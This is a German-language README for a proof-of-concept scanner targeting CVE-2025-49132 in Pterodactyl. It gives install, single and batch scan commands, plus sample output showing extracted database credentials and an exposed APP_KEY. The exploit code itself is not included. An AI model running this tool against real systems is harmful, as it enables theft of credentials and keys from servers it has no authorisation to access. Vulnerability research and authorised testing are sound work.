
Poc - CVE-2025-49132
Dieser Scanner arbeitet direkt auf Python ohne Docker-Abhängigkeiten und eignet sich für Umgebungen, in denen Docker nicht verfügbar oder nicht bevorzugt wird.
pip install -r requirements-standalone.txt
Manuelle Installation:
pip install requests urllib3
python standalone_scanner.py scan http://localhost/
Erstellen Sie targets.txt:
http://localhost/
http://localhost:8080
http://localhost:3000
Batch-Scan ausführen:
python standalone_scanner.py batch --file targets.txt
python standalone_scanner.py batch --file targets.txt --output results.json
python standalone_scanner.py interactive
🔍 Scanne: http://localhost/
⏰ Zeit: 2025-01-27 15:30:45
------------------------------------------------------------
✅ ANFÄLLIG - Datenbank-Anmeldedaten gefunden!
📊 Datenbank-Info:
Host: localhost
Port: 3306
Database: root
Username: root
Password: secret123
🔗 Verbindungszeichenfolge: root:secret123@localhost:3306/root
✅ ANFÄLLIG - App-Konfiguration gefunden!
📊 App-Konfiguration:
App Key: base64:your_secret_key_here
Cipher: AES-256-CBC
Debug: false
Environment: production
App Name: Pterodactyl
App URL: http://localhost
Timezone: UTC
Locale: en
🔔 SICHERHEITSWARNUNG: APP_KEY offengelegt!
Dieser Schlüssel wird für Ver-/Entschlüsselung verwendet
Kann verwendet werden, um vertrauliche Daten zu entschlüsseln
🔍 Scanne: http://localhost/
⏰ Zeit: 2025-01-27 15:30:45
------------------------------------------------------------
❌ NICHT ANFÄLLIG (Status: 404)
| Merkmal | Eigenständig | Container |
|---|---|---|
| Einrichtungsaufwand | Minimal | Docker-abhängig |
| Abhängigkeiten | Python-Pakete | Docker + Python |
| Leistung | Optimiert | Vergleichbar |
| Prozessisolierung | Keine | Volle Isolierung |
| Portabilität bei Bereitstellung | Hoch | Mittel |
pip install requests
SSL-Warnungen werden automatisch unterdrückt. Keine zusätzliche Konfiguration erforderlich.
Standard-Timeout beträgt 10 Sekunden. Ändern Sie bei Bedarf den Parameter timeout im Quellcode.
# Install dependencies
pip install requests urllib3
# Perform test scan
python standalone_scanner.py scan http://localhost/
# Execute batch analysis
python standalone_scanner.py batch --file targets.txt --output results.json
Zieleingabe → HTTP-Anfrage → Antwortanalyse → Schwachstellenerkennung → Ausgabeerzeugung
Dieses Tool ist konzipiert für:
Hinweis: Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Zielsysteme scannen.